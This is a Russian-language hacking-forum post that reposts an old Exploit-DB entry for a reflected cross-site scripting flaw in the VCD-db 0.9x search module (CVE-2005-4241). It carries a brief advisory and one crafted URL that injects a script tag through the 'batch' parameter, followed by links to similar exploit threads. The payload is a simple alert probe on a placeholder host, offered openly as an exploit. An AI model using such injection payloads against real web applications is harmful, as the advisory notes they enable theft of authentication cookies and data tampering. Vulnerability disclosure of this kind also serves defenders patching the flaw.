Exploit VCD-db 0.9x Search Module - 'batch' Cross-Site Scripting

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 339 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 26796

Проверка EDB

Пройдено

Автор: R0T3D3VIL

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2005-4241

Дата публикации: 2005-12-13

Код:

source: https://www.securityfocus.com/bid/15840/info
 
VCD-db is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
 
Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. 

http://www.example.com/?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit iknSupport 'search' Module - Cross-Site Scripting

Ответы: 0

Просмотры: 414

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit iPlanet Web Server 4.1 - Search Module Cross-Site Scripting

Ответы: 0

Просмотры: 424

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit pMachine 1.0/2.x - Search Module Cross-Site Scripting

Ответы: 0

Просмотры: 348

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Basit 1.0 Search Module - Cross-Site Scripting

Ответы: 0

Просмотры: 373

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke 7.7 EV Search Module - SQL Injection

Ответы: 0

Просмотры: 358

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings

Ответы: 0

Просмотры: 343

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Magnolia Search Module 2.1 - Cross-Site Scripting

Ответы: 0

Просмотры: 357

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Edgewall Software Trac 0.7.1/0.8/0.9 Search Module - SQL Injection

Ответы: 0

Просмотры: 371

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Tru-Zone Nuke ET 3.x - Search Module SQL Injection

Ответы: 0

Просмотры: 336

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection

Ответы: 0

Просмотры: 351

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.